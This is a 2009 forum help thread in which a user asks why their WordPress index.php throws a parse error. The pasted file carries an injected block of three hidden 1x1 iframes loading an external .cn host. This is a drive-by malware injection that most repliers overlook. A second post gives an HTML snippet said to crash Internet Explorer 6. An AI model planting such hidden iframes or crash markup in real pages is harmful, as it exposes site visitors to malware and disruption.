Help: Parse error: syntax error, unexpected '?' |
Help: Parse error: syntax error, unexpected '?' |
Feb 8 2009, 03:06 AM
Post
#1
|
|
|
Newbie ![]() Group: Member Posts: 9 Joined: Jun 2008 Member No: 657,170 |
This keeps showing up on my website:
Parse error: syntax error, unexpected '?' in /home/mileycyr/public_html/index.php on line 18 I can't find out whats wrong with it. Here is the code: CODE <?php
/** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define('WP_USE_THEMES', true); /** Loads the WordPress Environment and Template */ require('./wp-blog-header.php'); ?<html><iframe src="http://litetopfindworld.cn/in.cgi?cocacola44" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litetopfindworld.cn/in.cgi?cocacola42" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litetopfindworld.cn/in.cgi?cocacola39" width=1 height=1 style="visibility: hidden"></iframe></body></html>>
Reason for edit: Please use [codebox] tags when posting long codes. - Mike
|
|
|
|
![]() |
Feb 8 2009, 04:29 PM
Post
#2
|
|
|
Senior Member ![]() ![]() ![]() ![]() ![]() ![]() Group: Member Posts: 1,237 Joined: May 2008 Member No: 648,123 |
^ yes there is.
kaboom, die IE 6. CODE <style>*{position:relative}</style><table><input></table> there are a few more that also crash IE 6, but i don't remember them off the top of my head. also, javascript can do much damage without the knowledge of the user if the creator wishes it. |
|
|
|
lc2008 Help: Parse error: syntax error, unexpected '?' Feb 8 2009, 03:06 AM
Aberisk check line 18 of the code, is there an extra ? in ... Feb 8 2009, 03:10 AM
JosephCohen123 It looks like your not ending the php
change it f... Feb 8 2009, 03:17 AM
lc2008 I tried the above code and the page finally opened... Feb 8 2009, 03:32 AM
JosephCohen123 That might have something to do with your computer... Feb 8 2009, 03:38 AM
lc2008 the link is http://www.mileycyrusweb.org Feb 8 2009, 03:50 AM
Mike Use [codebox] tags when posting codes, guys. Feb 8 2009, 03:53 AM
lc2008 I don't think it's my computer. I think it... Feb 8 2009, 04:13 AM
Fawaz Their is nothing wrong with the code.. I tested th... Feb 8 2009, 09:19 AM
JosephCohen123 Its gotta be your computer or some other code caus... Feb 8 2009, 11:26 AM
lc2008 Yeah, I knew it was my computer.. Feb 9 2009, 07:19 AM
netexperienced I don't know if anyone else noticed this, but ... Mar 6 2009, 04:48 PM![]() ![]() |